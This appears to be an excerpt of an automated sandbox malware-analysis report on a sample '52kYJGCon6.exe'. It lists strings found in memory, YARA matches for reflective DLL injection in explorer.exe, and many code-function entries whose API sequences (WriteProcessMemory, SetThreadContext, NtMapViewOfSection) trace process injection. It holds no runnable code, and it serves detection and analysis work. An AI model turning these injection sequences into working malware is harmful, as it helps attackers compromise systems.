      Source: tmp8AEF.exe, 00000009.00000003.2281953921.000002E4B9BC0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283820341.000002E4B9C57000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282844715.000002E4B9BE0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283743849.000002E4B9BE1000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282767428.000002E4B9C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
      Source: explorer.exe, 00000003.00000003.3094406378.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000003.00000002.3349111862.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2117173710.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000003.00000002.3343563900.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
      Source: explorer.exe, 00000003.00000002.3343563900.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
      Source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drString found in binary or memory: https://www.digicert.com/CPS0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683937B50 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,11_2_00007FF683937B50

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 3.3.explorer.exe.caf63f0.4.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.2.explorer.exe.caf63f0.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.2.explorer.exe.caf63f0.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.2.explorer.exe.8b70535.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.3.explorer.exe.caf63f0.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.3.explorer.exe.caf63f0.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.2.explorer.exe.8b70535.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.3.explorer.exe.caf63f0.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.2.explorer.exe.10a50000.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.3.explorer.exe.caf63f0.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.3.explorer.exe.caf63f0.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 3.2.explorer.exe.10a50000.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 11.0.tmp1946.exe.7ff6838c0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 11.2.tmp1946.exe.7ff6838c0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exe, type: DROPPEDMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: C:\Windows\System32\svchost.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D12D60 GetTempPathW,GetTempFileNameW,NtSetInformationFile,NtWriteFile,GetLastError,0_2_00007FF795D12D60
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D12F38 NtCreateSection,NtClose,0_2_00007FF795D12F38
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D12BEC type_info::_name_internal_method,RtlInitUnicodeString,NtOpenFile,0_2_00007FF795D12BEC
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D12B44 NtMapViewOfSection,0_2_00007FF795D12B44
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D11750 NtReadVirtualMemory,0_2_00007FF795D11750
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D1312C NtCreateProcessEx,NtQueryInformationProcess,NtCreateThreadEx,0_2_00007FF795D1312C
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D133F8 free,free,malloc,NtQuerySystemInformation,free,0_2_00007FF795D133F8
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D11B30 NtSuspendProcess,NtResumeProcess,CloseHandle,NtResumeProcess,CloseHandle,GetCurrentProcess,DuplicateHandle,CreateThread,CloseHandle,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,GetExitCodeThread,CloseHandle,CloseHandle,strrchr,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,0_2_00007FF795D11B30
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D13328 NtQueryInformationFile,0_2_00007FF795D13328
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D11B30 NtSuspendProcess,NtResumeProcess,CloseHandle,NtResumeProcess,CloseHandle,GetCurrentProcess,DuplicateHandle,CreateThread,CloseHandle,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,GetExitCodeThread,CloseHandle,CloseHandle,strrchr,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,0_2_00007FF795D11B30
      Source: C:\Windows\explorer.exeCode function: 3_2_10A51370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,3_2_10A51370
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E612F38 NtCreateSection,NtClose,4_2_00007FF60E612F38
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E612D60 GetTempPathW,GetTempFileNameW,NtSetInformationFile,NtWriteFile,GetLastError,4_2_00007FF60E612D60
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E612B44 NtMapViewOfSection,4_2_00007FF60E612B44
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E612BEC type_info::_name_internal_method,RtlInitUnicodeString,NtOpenFile,4_2_00007FF60E612BEC
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E611750 NtReadVirtualMemory,4_2_00007FF60E611750
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E61312C NtCreateProcessEx,NtQueryInformationProcess,NtCreateThreadEx,4_2_00007FF60E61312C
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E6133F8 free,free,malloc,NtQuerySystemInformation,free,4_2_00007FF60E6133F8
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E611B30 NtSuspendProcess,NtResumeProcess,CloseHandle,NtResumeProcess,CloseHandle,GetCurrentProcess,DuplicateHandle,CreateThread,CloseHandle,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,GetExitCodeThread,CloseHandle,CloseHandle,strrchr,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,4_2_00007FF60E611B30
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E613328 NtQueryInformationFile,4_2_00007FF60E613328
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E611B30 NtSuspendProcess,NtResumeProcess,CloseHandle,NtResumeProcess,CloseHandle,GetCurrentProcess,DuplicateHandle,CreateThread,CloseHandle,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,GetExitCodeThread,CloseHandle,CloseHandle,strrchr,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,4_2_00007FF60E611B30
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BF81750 NtReadVirtualMemory,5_2_00007FF60BF81750
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BF8312C NtQueryInformationProcess,5_2_00007FF60BF8312C
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEB312C NtQueryInformationProcess,10_2_00007FF69BEB312C
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEB1750 NtReadVirtualMemory,10_2_00007FF69BEB1750
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2FBA00_2_00007FF795D2FBA0
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D43EE40_2_00007FF795D43EE4
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D436900_2_00007FF795D43690
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D35E200_2_00007FF795D35E20
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D3DD680_2_00007FF795D3DD68
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D338B40_2_00007FF795D338B4
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D388480_2_00007FF795D38848
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D417DC0_2_00007FF795D417DC
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D3D7440_2_00007FF795D3D744
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2F2040_2_00007FF795D2F204
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D449B00_2_00007FF795D449B0
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D414C80_2_00007FF795D414C8
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D3E4700_2_00007FF795D3E470
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D35B880_2_00007FF795D35B88
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D41B8C0_2_00007FF795D41B8C
      Source: C:\Windows\explorer.exeCode function: 3_2_10A517F03_2_10A517F0
      Source: C:\Windows\explorer.exeCode function: 3_2_10A7A8723_2_10A7A872
      Source: C:\Windows\explorer.exeCode function: 3_2_10A6C1A83_2_10A6C1A8
      Source: C:\Windows\explorer.exeCode function: 3_2_10A761303_2_10A76130
      Source: C:\Windows\explorer.exeCode function: 3_2_10A7A1403_2_10A7A140
      Source: C:\Windows\explorer.exeCode function: 3_2_10A6EA5C3_2_10A6EA5C
      Source: C:\Windows\explorer.exeCode function: 3_2_10A573A73_2_10A573A7
      Source: C:\Windows\explorer.exeCode function: 3_2_10A573B13_2_10A573B1
      Source: C:\Windows\explorer.exeCode function: 3_2_10A573BB3_2_10A573BB
      Source: C:\Windows\explorer.exeCode function: 3_2_10A5739D3_2_10A5739D
      Source: C:\Windows\explorer.exeCode function: 3_2_10A573C33_2_10A573C3
      Source: C:\Windows\explorer.exeCode function: 3_2_10A573CD3_2_10A573CD
      Source: C:\Windows\explorer.exeCode function: 3_2_10A75B0C3_2_10A75B0C
      Source: C:\Windows\explorer.exeCode function: 3_2_10A573103_2_10A57310
      Source: C:\Windows\explorer.exeCode function: 3_2_10A7131C3_2_10A7131C
      Source: C:\Windows\explorer.exeCode function: 3_2_10A76D183_2_10A76D18
      Source: C:\Windows\explorer.exeCode function: 3_2_10A786F03_2_10A786F0
      Source: C:\Windows\explorer.exeCode function: 3_2_10A6C7E83_2_10A6C7E8
      Source: C:\Windows\explorer.exeCode function: 3_2_10A6E7C43_2_10A6E7C4
      Source: C:\Windows\explorer.exeCode function: 3_2_10A70F6C3_2_10A70F6C
      Source: C:\Windows\explorer.exeCode function: 3_2_10A78F443_2_10A78F44
      Source: C:\Windows\explorer.exeCode function: 3_2_08B8E0F93_2_08B8E0F9
      Source: C:\Windows\explorer.exeCode function: 3_2_08B711253_2_08B71125
      Source: C:\Windows\explorer.exeCode function: 3_2_08B8C11D3_2_08B8C11D
      Source: C:\Windows\explorer.exeCode function: 3_2_08B99A753_2_08B99A75
      Source: C:\Windows\explorer.exeCode function: 3_2_08B8E3913_2_08B8E391
      Source: C:\Windows\explorer.exeCode function: 3_2_08B76CF63_2_08B76CF6
      Source: C:\Windows\explorer.exeCode function: 3_2_08B76CE23_2_08B76CE2
      Source: C:\Windows\explorer.exeCode function: 3_2_08B76CEC3_2_08B76CEC
      Source: C:\Windows\explorer.exeCode function: 3_2_08B76CD83_2_08B76CD8
      Source: C:\Windows\explorer.exeCode function: 3_2_08B76CCE3_2_08B76CCE
      Source: C:\Windows\explorer.exeCode function: 3_2_08B90C513_2_08B90C51
      Source: C:\Windows\explorer.exeCode function: 3_2_08B76C453_2_08B76C45
      Source: C:\Windows\explorer.exeCode function: 3_2_08B954413_2_08B95441
      Source: C:\Windows\explorer.exeCode function: 3_2_08B76D003_2_08B76D00
      Source: C:\Windows\explorer.exeCode function: 3_2_08B9664D3_2_08B9664D
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E62FBA04_2_00007FF60E62FBA0
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E63D7444_2_00007FF60E63D744
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E6417DC4_2_00007FF60E6417DC
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E6338B44_2_00007FF60E6338B4
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E6388484_2_00007FF60E638848
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E63DD684_2_00007FF60E63DD68
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E635E204_2_00007FF60E635E20
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E6436904_2_00007FF60E643690
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E643EE44_2_00007FF60E643EE4
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E635B884_2_00007FF60E635B88
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E641B8C4_2_00007FF60E641B8C
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E63E4704_2_00007FF60E63E470
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E6414C84_2_00007FF60E6414C8
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E6449B04_2_00007FF60E6449B0
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E62F2044_2_00007FF60E62F204
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BF9FBA05_2_00007FF60BF9FBA0
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFADD685_2_00007FF60BFADD68
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFA5E205_2_00007FF60BFA5E20
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFB36905_2_00007FF60BFB3690
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFB3EE45_2_00007FF60BFB3EE4
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFAD7445_2_00007FF60BFAD744
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFB17DC5_2_00007FF60BFB17DC
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFA88485_2_00007FF60BFA8848
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFA38B45_2_00007FF60BFA38B4
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFB49B05_2_00007FF60BFB49B0
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BF9F2045_2_00007FF60BF9F204
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFA5B885_2_00007FF60BFA5B88
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFB1B8C5_2_00007FF60BFB1B8C
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFAE4705_2_00007FF60BFAE470
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFB14C85_2_00007FF60BFB14C8
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7AFBD86_2_00007FF7CA7AFBD8
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B5C746_2_00007FF7CA7B5C74
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7910006_2_00007FF7CA791000
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B33BC6_2_00007FF7CA7B33BC
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A73F46_2_00007FF7CA7A73F4
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA798B206_2_00007FF7CA798B20
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B0B846_2_00007FF7CA7B0B84
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A2CC46_2_00007FF7CA7A2CC4
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A0C646_2_00007FF7CA7A0C64
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A14846_2_00007FF7CA7A1484
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A91B06_2_00007FF7CA7A91B0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7AD2006_2_00007FF7CA7AD200
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B518C6_2_00007FF7CA7B518C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A7AAC6_2_00007FF7CA7A7AAC
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B8A386_2_00007FF7CA7B8A38
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A0A606_2_00007FF7CA7A0A60
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A12806_2_00007FF7CA7A1280
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA79979B6_2_00007FF7CA79979B
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA799FCD6_2_00007FF7CA799FCD
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B2F206_2_00007FF7CA7B2F20
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A1F306_2_00007FF7CA7A1F30
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7AFBD86_2_00007FF7CA7AFBD8
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B57286_2_00007FF7CA7B5728
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A28C06_2_00007FF7CA7A28C0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A50406_2_00007FF7CA7A5040
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A10746_2_00007FF7CA7A1074
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7AD8806_2_00007FF7CA7AD880
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7995FB6_2_00007FF7CA7995FB
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7ACD6C6_2_00007FF7CA7ACD6C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B4F106_2_00007FF7CA7B4F10
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A0E706_2_00007FF7CA7A0E70
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B5C749_2_00007FF7CA7B5C74
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7910009_2_00007FF7CA791000
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B4F109_2_00007FF7CA7B4F10
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B33BC9_2_00007FF7CA7B33BC
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7AFBD89_2_00007FF7CA7AFBD8
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A73F49_2_00007FF7CA7A73F4
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA798B209_2_00007FF7CA798B20
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B0B849_2_00007FF7CA7B0B84
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A2CC49_2_00007FF7CA7A2CC4
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A0C649_2_00007FF7CA7A0C64
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A14849_2_00007FF7CA7A1484
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A91B09_2_00007FF7CA7A91B0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7AD2009_2_00007FF7CA7AD200
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B518C9_2_00007FF7CA7B518C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A7AAC9_2_00007FF7CA7A7AAC
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B8A389_2_00007FF7CA7B8A38
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A0A609_2_00007FF7CA7A0A60
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A12809_2_00007FF7CA7A1280
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA79979B9_2_00007FF7CA79979B
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA799FCD9_2_00007FF7CA799FCD
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B2F209_2_00007FF7CA7B2F20
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A1F309_2_00007FF7CA7A1F30
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7AFBD89_2_00007FF7CA7AFBD8
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B57289_2_00007FF7CA7B5728
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A28C09_2_00007FF7CA7A28C0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A50409_2_00007FF7CA7A5040
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A10749_2_00007FF7CA7A1074
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7AD8809_2_00007FF7CA7AD880
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7995FB9_2_00007FF7CA7995FB
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7ACD6C9_2_00007FF7CA7ACD6C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A0E709_2_00007FF7CA7A0E70
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8372A689_2_00007FF8B8372A68
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B831DAC09_2_00007FF8B831DAC0
